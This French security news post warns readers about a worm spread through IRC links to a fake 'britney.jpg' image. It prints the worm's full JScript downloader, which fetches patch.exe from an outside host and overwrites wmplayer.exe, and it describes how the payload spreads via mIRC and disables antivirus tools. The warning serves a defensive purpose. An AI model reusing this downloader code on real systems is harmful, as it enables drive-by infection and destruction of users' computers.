Accueil » Actualité » Attention nouveau virus: « britney.jpg »

Attention nouveau virus: « britney.jpg »

Depuis hier, un nouveau vers très dangereux circule sur Internet: il se diffuse via le réseau IRC et se cache derrière une image au format JPEG nommée « britney.jpg » hébergée sur les serveurs de Angelfire.

Ce vers exploite une faille de sécurité présente dans le navigateur Microsoft Internet Explorer ainsi que dans le lecteur Windows Media Player (documentée ici). Lorsque qu'un lien contenant le fichier « britney.jpg » est ouvert, ce petit bout de code se charge de télécharger un fichier .exe responsable du désordre qui règnera alors sur votre ordinateur:

-----

var x = new ActiveXObject("Microsoft.XMLHTTP");

x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0);

x.Send();

var s = new ActiveXObject("ADODB.Stream");

s.Mode = 3;

s.Type = 1;

s.Open();

s.Write(x.responseBody);

s.SaveToFile("C:Program FilesWindows Media Playerwmplayer.exe",2);

location.href = "mms://";

-----

Le programme patch.exe est compressé avec l'utilitaire de compression d'exécutables nommé UPX. Lorsque l'on analyse son contenu après décompression, on peut trouver la commande:

/.amsg http://www.angelfire.com/celeb2/picsx/britney.jpg <- uuh, check it out !!

Si le logiciel mIRC est lancé, alors un message contenant l'url infectée sera envoyé sur tous les salons de discussion sur lesquels vous êtes présent.

Ce fichier exécutable contient également une listes de fichiers systèmes tels ntoskrnl.exe, userinit.exe, services.exe, ainsi qu'une liste de fichiers exécutables correspondant à divers logiciels anti-virus et firewalls. Cette liste permet au vers de désactiver les logiciels de protection en question pour ensuite pouvoir remplacer/effacer les fichiers systèmes Windows et altérer le contenu de la base de registre. Si le service de protection des fichiers systèmes est activé, Windows détectera toutes ces modifications et vous proposera de redémarrer votre machine pour qu'il puisse procéder à une restauration des fichiers concernés.

Passé ce stade, vous pouvez considérer votre Windows comme perdu à tout jamais: tenter de réparer l'installation de Windows ou de restaurer les fichiers endommagés ne sera pas suffisant pour récupérer le système. Comme le vers aura altéré la base de registres, une réinstallation complète sera nécessaire.

Pour le moment, le virus ne s'attaquerait pas à Windows 98 mais il s'attaque de manière certaine au moins à Windows 2000 et Windows XP. Les logiciels anti-virus dans leur version actuelle ne vous seront d'aucune utilité puisque le virus n'est pas encore connu: surtout ne pas confondre ce nouveau vers avec le vers mIRC nommé "britny" dont vous pourrez trouver la description ici

Le site scavenger.sharewith.us auraît déjà pris les mesures nécessaires pour empêcher la diffusion du virus: le script ne peut plus télécharger le fichier patch.exe hébergé chez eux. Cependant la page du site Angelfire est encore active et rien n'empêche l'auteur du vers de modifier son oeuvre pour qu'elle utilise un autre patch.exe hébergé ailleurs. En conséquence, si vous utilisez Internet Explorer, ne cliquez pas sur un lien du type http://www.angelfire.com/***/***.jpg.